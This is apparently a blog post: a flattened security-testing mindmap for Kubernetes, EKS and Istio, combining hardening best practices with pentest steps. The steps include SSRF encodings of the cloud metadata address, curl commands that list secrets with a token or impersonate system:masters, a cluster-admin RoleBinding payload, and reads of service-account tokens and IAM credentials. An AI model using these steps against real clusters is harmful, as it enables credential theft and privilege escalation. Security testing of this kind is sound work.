
Kubernetes Security Testing Mindmap

Over the past months I’ve been testing Kubernetes clusters from different vendors, and this mindmap has helped me stay organized about what to look for during security testing.

In the mindmap there’s a section dedicated to AWS and EKS, including best practices, plus a Kubernetes section and an Istio section. Treat the mindmap as a checklist of things to hunt for in the cluster.

An example network policy to enable DNS and enforce traffic through the egress gateway.
An interesting approach to configuring this: https://monzo.com/blog/controlling-outbound-traffic-from-kubernetes
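A minimal sketch of such a policy, assuming kube-dns runs in kube-system and the egress gateway pods carry an (assumed) app: egress-gateway label; adjust labels and namespaces to match your cluster:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: restrict-egress-to-gateway   # hypothetical name
  namespace: default
spec:
  podSelector: {}            # applies to every pod in the namespace
  policyTypes:
    - Egress
  egress:
    - to:                    # allow DNS queries to kube-dns
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system   # label set by k8s >= 1.21
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53
    - to:                    # all other egress only via the egress gateway
        - namespaceSelector: {}
          podSelector:
            matchLabels:
              app: egress-gateway    # assumed gateway label
```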
http://A.8.8.8.8.1time.169.254.169.254.1time.repeat.rebind.network/ DNS Rebinding (8.8.8.8 -> AWS Metadata)
http://169.254.169.254.xip.io/ DNS Name
http://0251.00376.000251.0000376/ Dotted octal with padding
http://0251.0376.0251.0376/ Dotted octal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0xA9FEA9FE/ Dotless hexadecimal
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
http://7147006462/ Dotless decimal with overflow
http://2852039166/ Dotless decimal
http://425.510.425.510/ Dotted decimal with overflow
http://[0:0:0:0:0:ffff:169.254.169.254] IPv4-mapped IPv6 (expanded)
http://[::ffff:169.254.169.254] IPv4-mapped IPv6
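The dotless and overflow forms above can be derived mechanically. A quick Python check of the encodings:

```python
# Verify the alternative encodings of 169.254.169.254 listed above.
ip = [169, 254, 169, 254]

# Dotless decimal: the four octets packed into one 32-bit integer.
decimal = (ip[0] << 24) | (ip[1] << 16) | (ip[2] << 8) | ip[3]
print(decimal)              # 2852039166

# Overflow variant: add 2**32; parsers that truncate to 32 bits
# resolve it to the same address.
print(decimal + 2**32)      # 7147006462

# Dotless hexadecimal.
print(hex(decimal))         # 0xa9fea9fe

# Dotted decimal with overflow: each octet + 256.
print(".".join(str(o + 256) for o in ip))   # 425.510.425.510
```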
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/apis/extensions/v1beta1/namespaces/default/deployments
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
Check whether the edit, admin, or other (cluster) roles grant the impersonate verb
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinding.json
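A sketch of what the posted JSON file could contain (names here are hypothetical): it binds the cluster-admin ClusterRole to a service account the attacker controls.

```json
{
  "apiVersion": "rbac.authorization.k8s.io/v1",
  "kind": "RoleBinding",
  "metadata": {
    "name": "malicious-rolebinding",
    "namespace": "default"
  },
  "roleRef": {
    "apiGroup": "rbac.authorization.k8s.io",
    "kind": "ClusterRole",
    "name": "cluster-admin"
  },
  "subjects": [
    {
      "kind": "ServiceAccount",
      "name": "default",
      "namespace": "default"
    }
  ]
}
```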
Attackers who compromise a pod can bypass Envoy and all monitoring configured in the pod itself
Is there a network policy configured preventing all egress traffic not coming from the Egress Gateway?
Is there a firewall configured to only allow egress traffic coming from the Egress Gateway?
What Gateways and DestinationRules are configured? kubectl get gateway,destinationrule -A
What are the service entries configured? kubectl get ServiceEntry -A
Alternative endpoints
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM ROLE>
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
Service account secrets are mounted under /run/secrets/kubernetes.io/
env
K8S Linux Capabilities can be added and dropped using the securityContext
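For example, a sketch of a container securityContext that drops all capabilities and adds back only one (the image and the capability choice are illustrative):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: caps-demo          # hypothetical name
spec:
  containers:
    - name: app
      image: nginx         # placeholder image
      securityContext:
        capabilities:
          drop: ["ALL"]                # start from nothing
          add: ["NET_BIND_SERVICE"]    # add back only what is needed
```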
(on your laptop) capsh --decode=0000003fffffffff
cat /proc/<PID>/status | grep -i cap
ps -aef
cap_sys_boot
cap_sys_module
cap_sys_admin
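The three capabilities above can be checked for in a CapEff mask with a few lines of Python, a minimal stand-in for capsh --decode (bit positions are from linux/capability.h):

```python
# Bit positions of a few capabilities of interest (linux/capability.h).
CAPS = {16: "cap_sys_module", 21: "cap_sys_admin", 22: "cap_sys_boot"}

def decode(mask):
    """Return which of the interesting capabilities are set in mask."""
    return [name for bit, name in sorted(CAPS.items()) if mask >> bit & 1]

# CapEff of a fully privileged container (all capability bits set):
print(decode(0x0000003fffffffff))
# ['cap_sys_module', 'cap_sys_admin', 'cap_sys_boot']
```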
containers should not run as root
List daemonsets
List deployments
List secrets
List pods
curl -k http://<external-IP>:10255/
curl -k http://<external-IP>:10255/metrics
curl -k http://<external-IP>:10255/pods
curl -k https://<IP address>:2379/version
curl -k https://<IP address>:2379
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
Not exposed on EKS
curl -k https://<IP Address>:(8|6)443/api/v1
curl -k https://<IP Address>:(8|6)443/healthz or curl -k https://<IP Address>:(8|6)443/readyz
curl -k https://<IP Address>:(8|6)443/swaggerapi
/apis/authorization.k8s.io
/apis/apps
/apis
/api
6782-6784 - weave (metrics and endpoints)
9099 - calico-felix
10256 - kube-proxy
10250, 10255 - kubelet
8080 - insecure kube-apiserver
8443 - Minikube kube-apiserver
6443 - kube-apiserver
4194 - cAdvisor
2379 - etcd
443 - kube-apiserver
Impersonate
Change role-bindings
kubectl node-shell <node> (via the kubectl-node-shell plugin)
bootstrap-signer service account
Creating pods in kube-system is a no-no
Pod creation
Access any resource: resources: ["*"], verbs: ["create", "list", "get"]
Listing secrets
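In manifest form, the wildcard rule called out above looks like this (role name hypothetical); worth grepping for when reviewing RBAC:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: overly-broad      # hypothetical name
  namespace: default
rules:
  - apiGroups: ["*"]
    resources: ["*"]      # any resource in any API group
    verbs: ["create", "list", "get"]
```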
https://istio.io/latest/docs/tasks/traffic-management/egress/egress-gateway/
What are the Virtual Services configured? kubectl get VirtualService -A
Is it installed? kubectl get pod -l istio=egressgateway -n istio-system
Are critical services isolated?
Are there any overly broad hosts configurations?
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: "default"
spec:
  mtls:
    mode: STRICT

apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: allow-nothing
  namespace: default
spec:
  {}
Check for exposed AWS IAM key
kubectl get svc --all-namespaces
Env and secrets in the container
Linux capabilities
Least Privilege
Kernel exploits
cat /run/secrets/kubernetes.io/serviceaccount/token
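The token is a JWT, so its claims can be inspected offline. A sketch using only the standard library; the sample token below is fabricated for illustration:

```python
import base64, json

def jwt_payload(token):
    """Decode the (unverified) payload segment of a JWT."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)   # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Fabricated example token: header.payload.signature
header = base64.urlsafe_b64encode(b'{"alg":"RS256"}').rstrip(b"=").decode()
body = base64.urlsafe_b64encode(
    b'{"sub":"system:serviceaccount:default:default"}').rstrip(b"=").decode()
token = f"{header}.{body}.sig"

print(jwt_payload(token)["sub"])   # system:serviceaccount:default:default
```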
Anonymous Kubelet access
Anonymous ETCD access
Anonymous API access
Port Scanning
Privesc
https://github.com/appvia/krane
Build and sign your images
Lint your Dockerfiles
Create a set of curated images (consider creating a set of vetted images for the different application stacks in your organization)
Implement endpoint policies for ECR (the default endpoint policy allows access to all ECR repositories within a region)
Consider using ECR private endpoints (The ECR API has a public endpoint)
Create IAM policies for ECR repositories (If different teams don't need to share assets, you may want to create a set of IAM policies that restrict access to the repositories each team can interact with.)
Scan images for vulnerabilities regularly
Create minimal images (Start by removing all extraneous binaries from the container image)
Configure Selinux (https://github.com/containers/container-selinux)
Run Amazon Inspector to assess hosts for exposure, vulnerabilities, and deviations from best practices (Inspector requires the deployment of an agent)
Deploy workers onto private subnets
Minimize access to worker nodes (Instead of enabling SSH access, use SSM Session Manager when you need to remote into a host. https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager.html)
Runtime security (drop linux capabilities / use Pod Security Policies / AppArmor)
Use an external secrets provider (e.g. Hashicorp's Vault)
Use volume mounts instead of environment variables (The values of environment variables can unintentionally appear in logs)
Use separate namespaces as a way to isolate secrets from different applications
Rotate secrets periodically (Kubernetes doesn't automatically rotate secrets)
Audit secrets: use Kubernetes audit log: {(.verb="get") && (.objectRef.resource="secret")}
Use AWS KMS for envelope encryption of Kubernetes secrets.
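The earlier recommendation to prefer volume mounts over environment variables, sketched as a PodSpec (secret name and paths are hypothetical):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: secret-volume-demo     # hypothetical name
spec:
  containers:
    - name: app
      image: nginx             # placeholder image
      volumeMounts:
        - name: creds
          mountPath: /etc/creds
          readOnly: true
  volumes:
    - name: creds
      secret:
        secretName: db-credentials   # hypothetical secret
```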
Rotate your CMKs periodically (configure KMS to automatically rotate your CMKs)
Encrypt data at rest
Encryption in transit (for HIPAA/PCI): use TLS, a service mesh, ingress controllers and load balancers
Security group setup (https://docs.aws.amazon.com/eks/latest/userguide/sec-group-reqs.html)
Use encryption with AWS load balancers ( alb.ingress.kubernetes.io/certificate-arn --> adds certificates)
Log network traffic metadata (Manuela note: good recommendation but this could get very expensive really quick)
Create a rule to allow DNS queries
Create a default deny policy (network)
Tenant isolation (soft = namespaces or role bindings; hard = separate clusters)
Disable auto-mounting of service account tokens (If your application doesn't need to call the Kubernetes API set the automountServiceAccountToken attribute to false in the PodSpec: kubectl patch serviceaccount default -p $'automountServiceAccountToken: false')
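The same setting can also be expressed directly in a Pod manifest (names hypothetical):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: no-token-demo     # hypothetical name
spec:
  automountServiceAccountToken: false   # no token mounted into the pod
  containers:
    - name: app
      image: nginx        # placeholder image
```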
Scope the IAM Role trust policy for IRSA to the service account name (it's best to make the role trust policy as explicit as possible by including the service account name. This will effectively prevent other Pods within the same Namespace from assuming the role.)
Restrict access to the instance profile assigned to the worker node (the pod can still inherit the rights of the instance profile assigned to the worker node)
Update the aws-node daemonset to use IRSA (default: the aws-node daemonset is configured to use a role assigned to the EC2 instances to assign IPs to pods)
Do not allow privilege escalation (you can prevent a container from using privilege escalation by implementing a pod security policy that sets allowPrivilegeEscalation to false, or by setting securityContext.allowPrivilegeEscalation in the podSpec)
Set requests and limits for each container to avoid resource contention and DoS attacks (The podSpec allows you to specify requests and limits for CPU and memory)
Restrict the use of hostPath or if hostPath is necessary restrict which prefixes can be used and configure the volume as read-only (By default pods that run as root will have write access to the file system exposed by hostPath, to mitigate the risks from hostPath, configure the spec.containers.volumeMounts as readOnly AND use a pod security policy to restrict the directories that can be used by hostPath volumes, see https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation)
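A sketch of the read-only hostPath mitigation described above (paths are illustrative):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-demo      # hypothetical name
spec:
  containers:
    - name: app
      image: nginx         # placeholder image
      volumeMounts:
        - name: host-logs
          mountPath: /host/logs
          readOnly: true   # no write access to the host filesystem
  volumes:
    - name: host-logs
      hostPath:
        path: /var/log     # illustrative prefix; restrict via policy as well
```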
Never run Docker in Docker or mount the socket in the container
Grant least privileged access to applications
Run the application as a non-root user (Containers run as root by default, consider adding the spec.securityContext.runAsUser attribute to the PodSpec)
Do not run processes in containers as root (the Kubernetes podSpec includes a set of fields under spec.securityContext that let you specify the user and/or group to run your application as)
Scope the binding for privileged pods to service accounts within a particular namespace, e.g. kube-system, and limiting access to that namespace.
Use dedicated service accounts for each application (This applies to service accounts for the Kubernetes API as well as IRSA.)
Pod capabilities
Tenant isolation
Check /var/run/secrets/kubernetes.io/serviceaccount for sa and their permissions
Audit your CloudTrail logs (AWS APIs called by pods that are utilising IAM Roles for Service Accounts (IRSA) are automatically logged to CloudTrail along with the name of the service account.)
Create alarms for suspicious events (use attributes like host, sourceIPs, and k8s_user.username)
Audit logs (https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html#enabling-control-plane-log-export)
Make the EKS Cluster Endpoint private (or public with CIDR blocks whitelisting )
Dedicated IAM role for cluster creation (when you create an Amazon EKS cluster, the IAM entity (user or role) that creates it is automatically granted system:masters permissions in the cluster's RBAC configuration)
Least privileged access to AWS resources
Don't use a service account token for authentication (A service account token is a long-lived, static credential. If it is compromised, lost, or stolen, an attacker may be able to perform all the actions associated with that token until the service account is deleted)
Egress Gateway
Restrict who can create Gateways
Are there gateways configured?
What authorization policies are configured? kubectl get AuthorizationPolicy
Is mTLS traffic on strict mode?
Is there an allow-nothing authorization policy on each namespace?
kubeaudit all
tar -xf kubeaudit*
Download from releases
kubectl apply -f pentest/kubernetes/templates/kubehunter.yaml
Network Services
Container Security
Endpoints
RBAC configuration
Mutual TLS
Kubeaudit
Kube hunter
EKS
SkyArk powershell module
Istio
K8S
AWS
Kubernetes Security
This post is licensed under CC BY 4.0 by the author.